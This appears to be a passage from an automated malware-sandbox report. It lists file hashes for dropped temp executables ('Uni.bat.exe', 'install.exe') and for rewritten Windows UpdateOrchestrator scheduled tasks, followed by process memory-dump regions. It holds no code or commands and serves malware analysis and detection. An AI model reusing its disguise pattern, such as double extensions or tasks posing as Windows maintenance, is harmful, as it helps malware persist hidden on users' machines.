                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                      Filesize

                                                                                                                      330B

                                                                                                                      MD5

                                                                                                                      b50f4413b96aa9fca29fe5906cce5ed6

                                                                                                                      SHA1

                                                                                                                      6e3104961aa33d08e264d8dd4eabb65378741c59

                                                                                                                      SHA256

                                                                                                                      b09ef20b3c272332ce778c8d18b2b4bde99226f0cd6942716bca942fc8d89c7c

                                                                                                                      SHA512

                                                                                                                      a55e03222d23aed2a2e3d158466633f792417be451091668ad5f29087273a9f1cd131b0cfbec823c945b9d564e5f10a4bf2c5e261d373505c57de12cd058c51b

                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                      Filesize

                                                                                                                      330B

                                                                                                                      MD5

                                                                                                                      ff42eb21cbb6c97a5e958a0e1a7d551e

                                                                                                                      SHA1

                                                                                                                      47a1a265b5941c25f0283f7de7687250b2162c0b

                                                                                                                      SHA256

                                                                                                                      32ad4fdb973568586fce12ac81558349ff6a444a1b887584e20a934bd88e1fde

                                                                                                                      SHA512

                                                                                                                      0e30e5c05fd98c1f3acc454fc4a23b6ffa56ab6804fb58a75cd32518e2015fb4fdcd87f7030bd3d2ebd6681ad335d96ba7e1e5aa72c3dc77483c605cefb83fd6

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
                                                                                                                      Filesize

                                                                                                                      442KB

                                                                                                                      MD5

                                                                                                                      04029e121a0cfa5991749937dd22a1d9

                                                                                                                      SHA1

                                                                                                                      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                      SHA256

                                                                                                                      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                      SHA512

                                                                                                                      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qx3de31v.3e4.ps1
                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                      Filesize

                                                                                                                      162KB

                                                                                                                      MD5

                                                                                                                      152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                      SHA1

                                                                                                                      c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                      SHA256

                                                                                                                      a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                      SHA512

                                                                                                                      2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                      SHA1

                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                      SHA256

                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                      SHA512

                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                      SHA1

                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                      SHA256

                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                      SHA512

                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                      SHA1

                                                                                                                      a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                      SHA256

                                                                                                                      98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                      SHA512

                                                                                                                      1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                      SHA1

                                                                                                                      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                      SHA256

                                                                                                                      727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                      SHA512

                                                                                                                      f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                      SHA1

                                                                                                                      5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                      SHA256

                                                                                                                      55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                      SHA512

                                                                                                                      5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                      SHA1

                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                      SHA256

                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                      SHA512

                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                    • memory/332-113-0x00007FF8C6AF0000-0x00007FF8C6B00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/332-112-0x0000029345550000-0x000002934557B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/332-106-0x0000029345550000-0x000002934557B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/404-117-0x000001F2CC4F0000-0x000001F2CC51B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/608-71-0x0000020B0A460000-0x0000020B0A485000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      148KB

                                                                                                                    • memory/608-72-0x0000020B0A490000-0x0000020B0A4BB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/608-79-0x0000020B0A490000-0x0000020B0A4BB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/608-73-0x0000020B0A490000-0x0000020B0A4BB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/608-80-0x00007FF8C6AF0000-0x00007FF8C6B00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/628-11-0x000001776FAA0000-0x000001776FAC2000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/628-489-0x00007FF8E86F0000-0x00007FF8E91B1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/628-19-0x000001776FC10000-0x000001776FC7C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      432KB

                                                                                                                    • memory/628-20-0x000001776FCA0000-0x000001776FCB2000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      72KB

                                                                                                                    • memory/628-17-0x000001776FBD0000-0x000001776FC0E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      248KB

                                                                                                                    • memory/628-15-0x00007FF8E86F0000-0x00007FF8E91B1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/628-16-0x00007FF8E86F0000-0x00007FF8E91B1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/628-21-0x0000017770660000-0x000001777069C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      240KB

                                                                                                                    • memory/628-4-0x00007FF8E86F3000-0x00007FF8E86F5000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/672-91-0x00007FF8C6AF0000-0x00007FF8C6B00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/672-90-0x00000209077D0000-0x00000209077FB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/672-84-0x00000209077D0000-0x00000209077FB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/952-101-0x000001B08ABA0000-0x000001B08ABCB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/952-102-0x00007FF8C6AF0000-0x00007FF8C6B00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/952-95-0x000001B08ABA0000-0x000001B08ABCB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/2604-56-0x00007FF906A70000-0x00007FF906C65000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                    • memory/2604-57-0x00007FF905800000-0x00007FF9058BE000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                    • memory/2604-55-0x0000023D73DF0000-0x0000023D73E1A000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      168KB

                                                                                                                    • memory/3256-66-0x00007FF906A70000-0x00007FF906C65000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                    • memory/3256-68-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3256-67-0x00007FF905800000-0x00007FF9058BE000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                    • memory/3256-58-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3256-59-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3256-60-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3256-63-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3256-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3840-39-0x00000240312B0000-0x0000024031326000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      472KB

                                                                                                                    • memory/3840-38-0x00000240311E0000-0x0000024031224000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      272KB

                                                                                                                    • memory/3840-880-0x00007FF8E86F0000-0x00007FF8E91B1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/3840-37-0x00007FF8E86F0000-0x00007FF8E91B1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/3840-36-0x00007FF8E86F0000-0x00007FF8E91B1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/3840-31-0x00007FF8E86F0000-0x00007FF8E91B1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB